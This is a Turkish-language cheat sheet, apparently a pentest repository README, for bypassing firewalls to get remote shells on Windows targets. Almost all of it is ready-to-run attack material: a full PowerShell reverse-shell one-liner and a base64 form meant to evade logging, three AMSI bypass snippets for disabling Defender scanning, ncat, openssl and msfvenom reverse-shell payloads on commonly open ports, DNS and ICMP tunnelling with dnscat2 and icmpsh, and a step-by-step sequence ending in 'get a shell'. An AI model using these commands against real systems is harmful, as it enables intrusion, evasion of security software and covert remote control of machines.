=============================================================
  GÜVENLIK DUVARI (FIREWALL) BYPASS - CHEATSHEET
  Yalnızca izinli pentest ortamlarında kullanın!
=============================================================


[1] NEDEN GÜVENLİK DUVARI ENGELLER?
─────────────────────────────────────
- Windows Firewall gelen/giden bağlantıları port bazlı filtreler
- Yaygın reverse shell portları (4444, 1234 vb.) genelde engellenir
- IDS/IPS sistemleri şifrelenmemiş shell trafiğini yakalar
- Çözüm: İzin verilen portları ve şifreli trafiği kullanmak


[2] İZİN VERİLEN PORTLAR (En çok başarılı olanlar)
─────────────────────────────────────
Port 443 (HTTPS)  → En güvenilir, şifreli, her yerde açık
Port 80  (HTTP)   → Genelde açık, ama şifresiz trafik IDS'e yakalanır  
Port 53  (DNS)    → Neredeyse her zaman açık (DNS tünelleme için ideal)
Port 8080         → Alternatif web portu, çoğu yerde açık


[3] YÖNTEMLERİN KARŞILAŞTIRMASI
─────────────────────────────────────
Yöntem              | Gizlilik | Hız   | Zorluk  | Dosya
────────────────────|──────────|───────|─────────|──────────────────────────────
SSL Reverse Shell   | Yüksek   | Hızlı | Kolay   | 1_Encrypted_Reverse_Shell.py
HTTP Tünelleme      | Yüksek   | Orta  | Orta    | 3_HTTP_Tunnel.py
PowerShell          | Orta     | Hızlı | Kolay   | Aşağıdaki komutlar
DNS Tünelleme       | Çok Yüksek| Yavaş| Zor     | Harici araç (dnscat2)
ICMP Tünelleme      | Yüksek   | Yavaş | Orta    | Harici araç (icmpsh)


[4] SSL/TLS ŞİFRELİ REVERSE SHELL (Port 443)
─────────────────────────────────────

--- Kali'de (Listener) ---

# Yöntem A: Bu repo'daki script ile
  sudo python3 2_Listener.py

# Yöntem B: OpenSSL ile (tek komut)
  openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  openssl s_server -quiet -key key.pem -cert cert.pem -port 443

# Yöntem C: ncat ile
  ncat --ssl -lvnp 443

--- Hedef Makinede ---

# Yöntem A: Bu repo'daki script ile
  python3 1_Encrypted_Reverse_Shell.py

# Yöntem B: ncat ile
  ncat --ssl <KALI_IP> 443 -e cmd.exe

# Yöntem C: msfvenom payload (en güvenilir)
  msfvenom -p windows/shell_reverse_tcp LHOST=<KALI_IP> LPORT=443 -f exe -o shell.exe


[5] POWERSHELL REVERSE SHELL (Dosyasız - Living Off The Land)
─────────────────────────────────────
Avantaj: Disk'e dosya yazmaz, antivirüs taramasına takılmaz.

# Temel PowerShell Reverse Shell (Port 443)
powershell -nop -w hidden -ep bypass -c "$c=New-Object Net.Sockets.TCPClient('<KALI_IP>',443);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([Text.Encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()"

# Base64 Encoded versiyonu (komut satırı loglarında gizlenir)
powershell -nop -w hidden -ep bypass -enc <BASE64_ENCODED_COMMAND>

# Base64 encode etmek için (Kali'de):
echo -n '<POWERSHELL_KOMUTU>' | iconv -t UTF-16LE | base64 -w 0


[6] AMSI (ANTI-MALWARE SCAN INTERFACE) BYPASS
─────────────────────────────────────
Windows Defender, bellekteki PowerShell komutlarını engellerse 
önce aşağıdaki AMSI bypass komutlarından birini çalıştırın.

# Yöntem A: Matt Graeber Reflection (En bilineni, bazen yakalanır)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Yöntem B: Hex Obfuscated Reflection (Daha güvenilir)
[Ref].Assembly.GetType('System.Management.Automation.'+$([char]65)+'msiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Yöntem C: Memory Patching (AmsiScanBuffer) - Gelişmiş
$a=[Ref].Assembly.GetTypes();foreach($b in $a){if($b.Name -eq 'AmsiUtils'){$c=$b.GetField('amsiInitFailed','NonPublic,Static');$c.SetValue($null,$true)}}

AMSI aşıldıktan sonra Bölüm [5]'teki PowerShell reverse shell komutunu çalıştırabilirsiniz.


[7] HTTP TÜNELLEMESİ (Port 80 - Normal Web Trafiği Gibi)
─────────────────────────────────────

--- Kali'de ---
  python3 3_HTTP_Tunnel.py --server --port 80

--- Hedef Makinede ---
  python3 3_HTTP_Tunnel.py --client --host <KALI_IP> --port 80


[8] DNS TÜNELLEMESİ (Port 53)
─────────────────────────────────────
En gizli yöntem. DNS sorguları neredeyse hiç engellenmez.

# dnscat2 kurulumu (Kali)
  git clone https://github.com/iagox86/dnscat2.git
  cd dnscat2/server
  gem install bundler
  bundle install
  ruby dnscat2.rb

# dnscat2 client (Hedef - Windows)
  dnscat2-v0.07-client-win32.exe --dns server=<KALI_IP>,port=53


[9] ICMP TÜNELLEMESİ (Ping Üzerinden)
─────────────────────────────────────
Ping trafiği üzerinden veri taşır. Çoğu firewall ping'e izin verir.

# icmpsh kurulumu (Kali)
  git clone https://github.com/bdamele/icmpsh.git
  cd icmpsh
  sysctl -w net.ipv4.icmp_echo_ignore_all=1
  python3 icmpsh_m.py <KALI_IP> <HEDEF_IP>

# icmpsh client (Hedef - Windows)
  icmpsh.exe -t <KALI_IP>


[10] MSFVENOM PAYLOAD ÜRETİMİ (Port Bazlı)
─────────────────────────────────────

# Port 443 üzerinden (HTTPS - en güvenilir)
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=443 EXITFUNC=thread -f exe -o https_shell.exe

# Port 80 üzerinden (HTTP)
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=80 EXITFUNC=thread -f exe -o http_shell.exe

# Port 53 üzerinden (DNS)
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=53 EXITFUNC=thread -f exe -o dns_shell.exe

# PowerShell formatında (dosyasız)
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=443 -f psh-cmd -o shell.ps1

# Python formatında
msfvenom -p python/shell_reverse_tcp LHOST=<IP> LPORT=443 -f raw -o shell.py


[11] AÇIK PORT BULMA (Önce Bunu Yapın!)
─────────────────────────────────────

# Bu repo'daki araç ile
  python3 4_Port_Scanner.py --target <HEDEF_IP>

# Nmap ile
  nmap -sT -p 80,443,53,8080,8443 <HEDEF_IP>


[12] HIZLI BAŞLANGIÇ SIRASI
─────────────────────────────────────

  1. Açık portları tara      →  python3 4_Port_Scanner.py --target <IP>
  2. Açık porta göre seç:
     • 443 açıksa → SSL Reverse Shell (1_ ve 2_ scriptleri)
     • 80 açıksa  → HTTP Tünelleme (3_ scripti)
     • 53 açıksa  → DNS Tünelleme (dnscat2)
  3. Kali'de listener başlat
  4. Hedefte payload çalıştır
  5. Shell al!
